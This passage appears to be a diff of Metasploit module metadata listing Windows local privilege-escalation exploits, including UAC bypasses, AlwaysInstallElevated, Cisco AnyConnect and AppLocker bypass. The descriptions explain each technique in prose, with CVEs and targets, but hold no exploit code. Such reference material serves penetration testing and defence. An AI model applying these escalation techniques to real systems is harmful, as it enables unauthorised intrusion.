After creating a hardlink, the vulnerability\n can be triggered to set the DACL on the linked file.\n\n WARNING:\n The PrintConfig.dll (%windir%\\system32\\driverstor\\filerepository\\prnms003*) on the target host\n will be overwritten when the exploit runs.\n\n This module has been tested against Windows 10 Pro x64.", - "references": [ - "CVE-2018-8440", - "URL-https://github.com/SandboxEscaper/randomrepo/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/alpc_taskscheduler.rb", - "is_install_path": true, - "ref_name": "windows/local/alpc_taskscheduler", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "os-resource-loss" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/always_install_elevated": { - "name": "Windows AlwaysInstallElevated MSI", - "fullname": "exploit/windows/local/always_install_elevated", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-03-18", - "type": "exploit", - "author": [ - "Ben Campbell ", - "Parvez Anwar" - ], - "description": "This module checks the AlwaysInstallElevated registry keys which dictates if\n .MSI files should be installed with elevated privileges (NT AUTHORITY\\SYSTEM).\n The generated .MSI file has an embedded executable which is extracted and run\n by the installer. 
After execution the .MSI file intentionally fails installation\n (by calling some invalid VBS) to prevent it being registered on the system.\n By running this with the /quiet argument the error will not be seen by the user.", - "references": [ - "URL-http://www.greyhathacker.net/?p=185", - "URL-http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx", - "URL-http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/local/always_install_elevated.rb", - "is_install_path": true, - "ref_name": "windows/local/always_install_elevated", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/anyconnect_lpe": { - "name": "Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)", - "fullname": "exploit/windows/local/anyconnect_lpe", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-08-05", - "type": "exploit", - "author": [ - "Yorick Koster", - "Antoine Goichot (ATGO)", - "Christophe De La Fuente" - ], - "description": "The installer component of Cisco AnyConnect Secure Mobility Client for Windows\n prior to 4.8.02042 is vulnerable to path traversal and allows local attackers\n to create/overwrite files in arbitrary locations with system level privileges.\n\n The installer component of Cisco AnyConnect Secure Mobility Client for Windows\n prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers\n to execute code on the affected machine with with system level privileges.\n\n Both attacks consist in sending a specially crafted IPC request to the TCP\n port 62522 on the loopback device, which is exposed by the Cisco AnyConnect\n 
Secure Mobility Agent service. This service will then launch the vulnerable\n installer component (`vpndownloader`), which copies itself to an arbitrary\n location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being\n executed with system privileges. Since `vpndownloader` is also vulnerable to DLL\n hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same\n location `vpndownloader` will be copied to get code execution with system\n privileges.\n\n The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect\n Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10\n version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been\n successfully tested against Cisco AnyConnect Secure Mobility Client versions\n 4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version\n 1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).", - "references": [ - "URL-https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj", - "CVE-2020-3153", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW", - "CVE-2020-3433" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86/x64 with x86 payload" - ], - "mod_time": "2023-01-28 09:08:51 +0000", - "path": "/modules/exploits/windows/local/anyconnect_lpe.rb", - "is_install_path": true, - "ref_name": "windows/local/anyconnect_lpe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, 
- "exploit_windows/local/applocker_bypass": { - "name": "AppLocker Execution Prevention Bypass", - "fullname": "exploit/windows/local/applocker_bypass", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-08-03", - "type": "exploit", - "author": [ - "Casey Smith", - "OJ Reeves" - ], - "description": "This module will generate a .NET service executable on the target and utilize\n InstallUtil to run the payload bypassing the AppLocker protection.\n\n Currently only the InstallUtil method is provided, but future methods can be\n added easily.", - "references": [ - "URL-https://gist.github.com/subTee/fac6af078937dda81e57" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/local/applocker_bypass.rb", - "is_install_path": true, - "ref_name": "windows/local/applocker_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/appxsvc_hard_link_privesc": { - "name": "AppXSvc Hard Link Privilege Escalation", - "fullname": "exploit/windows/local/appxsvc_hard_link_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-04-09", - "type": "exploit", - "author": [ - "Nabeel Ahmed", - "James Forshaw", - "Shelby Pace" - ], - "description": "There exists a privilege escalation vulnerability for\n Windows 10 builds prior to build 17763. Due to the AppXSvc's\n improper handling of hard links, a user can gain full\n privileges over a SYSTEM-owned file. 
The user can then utilize\n the new file to execute code as SYSTEM.\n\n This module employs a technique using the Diagnostics Hub Standard\n Collector Service (DiagHub) which was discovered by James Forshaw to\n load and execute a DLL as SYSTEM.", - "references": [ - "CVE-2019-0841", - "URL-https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/", - "URL-https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html", - "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", - "URL-https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/appxsvc_hard_link_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ask": { - "name": "Windows Escalate UAC Execute RunAs", - "fullname": "exploit/windows/local/ask", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-01-03", - "type": "exploit", - "author": [ - "mubix ", - "b00stfr3ak" - ], - "description": "This module will attempt to elevate execution level using\n the ShellExecute undocumented RunAs flag to bypass low\n UAC settings.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/local/ask.rb", - "is_install_path": true, - "ref_name": "windows/local/ask", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": 
{}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bits_ntlm_token_impersonation": { - "name": "SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.", - "fullname": "exploit/windows/local/bits_ntlm_token_impersonation", - "aliases": [], - "rank": 500, - "disclosure_date": "2019-12-06", - "type": "exploit", - "author": [ - "Cassandre", - "Andrea Pierini (decoder)", - "Antonio Cocomazzi (splinter_code)", - "Roberto (0xea31)" - ], - "description": "This module exploit BITS behavior which tries to connect to the\n local Windows Remote Management server (WinRM) every times it\n starts. The module launches a fake WinRM server which listen on\n port 5985 and triggers BITS. When BITS starts, it tries to\n authenticate to the Rogue WinRM server, which allows to steal a\n SYSTEM token. This token is then used to launch a new process\n as SYSTEM user. In the case of this exploit, notepad.exe is launched\n as SYSTEM. Then, it write shellcode in its previous memory space\n and trigger its execution. As this exploit uses reflective dll\n injection, it does not write any file on the disk. See\n /documentation/modules/exploit/windows/local/bits_ntlm_token_impersonation.md\n for complementary words of information.\n\n Vulnerable operating systems are Windows 10 and Windows servers where WinRM is not running.\n Lab experiments has shown that Windows 7 does not exhibit the vulnerable behavior.\n\n WARNING:\n\n - As this exploit runs a service on the target (Fake WinRM on port\n 5985), a firewall popup may appear on target screen. 
Thus, this exploit\n may not be completely silent.\n\n - This exploit has been successfully tested on :\n Windows 10 (10.0 Build 19041) 32 bits\n Windows 10 Pro, Version 1903 (10.0 Build 18362) 64 bits\n\n - This exploit failed because of no BITS authentication attempt on:\n Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits\n\n - Windows servers are not vulnerable because a genuine WinRM\n service is already running, except if the user has disabled it\n (Or if this exploit succeed to terminate it).\n\n - SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privs are\n required.\n\n - BITS must not be running.\n\n - This exploit automatically perform above quoted checks.\n run \"check\" command to run checklist.", - "references": [ - "URL-https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/", - "URL-https://github.com/antonioCoco/RogueWinRM" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bits_ntlm_token_impersonation.rb", - "is_install_path": true, - "ref_name": "windows/local/bits_ntlm_token_impersonation", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bthpan": { - "name": "MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", - "fullname": "exploit/windows/local/bthpan", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-07-18", - "type": "exploit", - "author": [ - "Matt Bergin ", - "Jay Smith " - ], - "description": "A vulnerability within Microsoft Bluetooth Personal Area Networking module,\n BthPan.sys, can allow an 
attacker to inject memory controlled by the attacker\n into an arbitrary location. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile.", - "references": [ - "MSB-MS14-062", - "CVE-2014-4971", - "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt", - "OSVDB-109387" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bthpan.rb", - "is_install_path": true, - "ref_name": "windows/local/bthpan", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac": { - "name": "Windows Escalate UAC Protection Bypass", - "fullname": "exploit/windows/local/bypassuac", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-12-31", - "type": "exploit", - "author": [ - "David Kennedy \"ReL1K\" ", - "mitnick", - "mubix " - ], - "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. 
It will spawn a second shell that\n has the UAC flag turned off.", - "references": [ - "URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac_comhijack": { - "name": "Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)", - "fullname": "exploit/windows/local/bypassuac_comhijack", - "aliases": [], - "rank": 600, - "disclosure_date": "1900-01-01", - "type": "exploit", - "author": [ - "Matt Nelson", - "b33f", - "OJ Reeves" - ], - "description": "This module will bypass Windows UAC by creating COM handler registry entries in the\n HKCU hive. When certain high integrity processes are loaded, these registry entries\n are referenced resulting in the process loading user-controlled DLLs. These DLLs\n contain the payloads that result in elevated sessions. Registry key modifications\n are cleaned up after payload invocation.\n\n This module requires the architecture of the payload to match the OS, but the\n current low-privilege Meterpreter session architecture can be different. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.\n\n This module invokes the target binary via cmd.exe on the target. 
Therefore if\n cmd.exe access is restricted, this module will not run correctly.", - "references": [ - "URL-https://wikileaks.org/ciav7p1/cms/page_13763373.html", - "URL-https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2024-09-04 23:49:33 +0000", - "path": "/modules/exploits/windows/local/bypassuac_comhijack.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_comhijack", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_dotnet_profiler": { - "name": "Windows Escalate UAC Protection Bypass (Via dot net profiler)", - "fullname": "exploit/windows/local/bypassuac_dotnet_profiler", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-03-17", - "type": "exploit", - "author": [ - "Casey Smith", - "\"Stefan Kanthak\" ", - "bwatters-r7" - ], - "description": "Microsoft Windows allows for the automatic loading of a profiling COM object during\n the launch of a CLR process based on certain environment variables ostensibly to\n monitor execution. In this case, we abuse the profiler by pointing to a payload DLL\n that will be launched as the profiling thread. This thread will run at the permission\n level of the calling process, so an auto-elevating process will launch the DLL with\n elevated permissions. 
In this case, we use gpedit.msc as the auto-elevated CLR\n process, but others would work, too.", - "references": [ - "URL-https://seclists.org/fulldisclosure/2017/Jul/11", - "URL-https://offsec.provadys.com/UAC-bypass-dotnet.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-07-21 15:34:49 +0000", - "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_dotnet_profiler", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_eventvwr": { - "name": "Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)", - "fullname": "exploit/windows/local/bypassuac_eventvwr", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-08-15", - "type": "exploit", - "author": [ - "Matt Nelson", - "Matt Graeber", - "OJ Reeves" - ], - "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows Event Viewer is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. 
If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.", - "references": [ - "URL-https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_eventvwr.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_eventvwr", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac_fodhelper": { - "name": "Windows UAC Protection Bypass (Via FodHelper Registry Key)", - "fullname": "exploit/windows/local/bypassuac_fodhelper", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-12", - "type": "exploit", - "author": [ - "winscriptingblog", - "amaloteaux " - ], - "description": "This module will bypass Windows 10 UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. 
If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.", - "references": [ - "URL-https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", - "URL-https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1", - "URL-https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2025-04-23 17:49:11 +0000", - "path": "/modules/exploits/windows/local/bypassuac_fodhelper.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_fodhelper", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac_injection": { - "name": "Windows Escalate UAC Protection Bypass (In Memory Injection)", - "fullname": "exploit/windows/local/bypassuac_injection", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-12-31", - "type": "exploit", - "author": [ - "David Kennedy \"ReL1K\" ", - "mitnick", - "mubix ", - "Ben Campbell ", - "Lesage", - "OJ Reeves" - ], - "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off. This module uses the Reflective DLL Injection\n technique to drop only the DLL payload binary instead of three separate\n binaries in the standard technique. 
However, it requires the correct\n architecture to be selected, (use x64 for SYSWOW64 systems also).\n If specifying EXE::Custom your DLL should call ExitProcess() after starting\n your payload in a separate process.", - "references": [ - "URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/", - "URL-http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_injection.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_injection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_injection_winsxs": { - "name": "Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS", - "fullname": "exploit/windows/local/bypassuac_injection_winsxs", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-04-06", - "type": "exploit", - "author": [ - "Ernesto Fernandez \"L3cr0f\" " - ], - "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off by abusing the way \"WinSxS\" works in Windows\n systems. This module uses the Reflective DLL Injection technique to drop\n only the DLL payload binary instead of three seperate binaries in the\n standard technique. 
However, it requires the correct architecture to be\n selected, (use x64 for SYSWOW64 systems also).", - "references": [ - "URL-https://github.com/L3cr0f/DccwBypassUAC" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_injection_winsxs.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_injection_winsxs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_sdclt": { - "name": "Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)", - "fullname": "exploit/windows/local/bypassuac_sdclt", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-03-17", - "type": "exploit", - "author": [ - "enigma0x3", - "bwatters-r7" - ], - "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n Window backup and restore is launched. 
It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.", - "references": [ - "URL-https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", - "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1", - "URL-https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_sdclt", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_silentcleanup": { - "name": "Windows Escalate UAC Protection Bypass (Via SilentCleanup)", - "fullname": "exploit/windows/local/bypassuac_silentcleanup", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-02-24", - "type": "exploit", - "author": [ - "tyranid", - "enigma0x3", - "nyshone69", - "lokiuox", - "Carter Brainerd (cbrnrd)" - ], - "description": "There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges.\n When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. 
Since it runs as Users, and we can control user's environment variables,\n %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.", - "references": [ - "URL-https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html", - "URL-https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/", - "URL-https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", - "URL-https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/local/bypassuac_silentcleanup.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_silentcleanup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_sluihijack": { - "name": "Windows UAC Protection Bypass (Via Slui File Handler Hijack)", - "fullname": "exploit/windows/local/bypassuac_sluihijack", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-01-15", - "type": "exploit", - "author": [ - "bytecode-77", - "gushmazuko" - ], - "description": "This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under\n the Current User hive, and inserting a custom command that will get invoked when any binary\n (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable\n to file handler hijacking. 
When we run slui.exe with changed Registry key\n (HKCU:\\Software\\Classes\\exefile\\shell\\open\\command), it will run our custom command as Admin\n instead of slui.exe.\n\n The module modifies the registry in order for this exploit to work. The modification is\n reverted once the exploitation attempt has finished.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting the\n payload in a different process.", - "references": [ - "URL-https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation", - "URL-https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_sluihijack.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_sluihijack", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac_vbs": { - "name": "Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)", - "fullname": "exploit/windows/local/bypassuac_vbs", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-08-22", - "type": "exploit", - "author": [ - "Vozzie", - "Ben Campbell " - ], - "description": "This module will bypass Windows UAC by utilizing the missing .manifest on the script host\n cscript/wscript.exe binaries.", - "references": [ - "URL-http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html", - "URL-https://github.com/Vozzie/uacscript" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": 
"2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_vbs.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_vbs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_windows_store_filesys": { - "name": "Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)", - "fullname": "exploit/windows/local/bypassuac_windows_store_filesys", - "aliases": [], - "rank": 0, - "disclosure_date": "2019-08-22", - "type": "exploit", - "author": [ - "ACTIVELabs", - "sailay1996", - "timwr" - ], - "description": "This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool\n is run with the \"autoElevate\" property set to true, however it can be moved to\n a new Windows directory containing a space (C:\\Windows \\System32\\) where, upon\n execution, it will load our payload dll (propsys.dll).", - "references": [ - "URL-https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html", - "URL-https://github.com/sailay1996/UAC_bypass_windows_store", - "URL-https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_windows_store_filesys.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_windows_store_filesys", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_windows_store_reg": { - "name": "Windows 10 UAC Protection Bypass 
Via Windows Store (WSReset.exe) and Registry", - "fullname": "exploit/windows/local/bypassuac_windows_store_reg", - "aliases": [], - "rank": 0, - "disclosure_date": "2019-02-19", - "type": "exploit", - "author": [ - "ACTIVELabs", - "sailay1996", - "bwatters-r7" - ], - "description": "This module exploits a flaw in the WSReset.exe file associated with the Windows\n Store. This binary has autoelevate privs, and it will run a binary file\n contained in a low-privilege registry location. By placing a link to\n the binary in the registry location, WSReset.exe will launch the binary as\n a privileged user.", - "references": [ - "URL-https://www.activecyber.us/activelabs/windows-uac-bypass", - "URL-https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html", - "URL-https://github.com/sailay1996/UAC_bypass_windows_store" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_windows_store_reg.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_windows_store_reg", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, 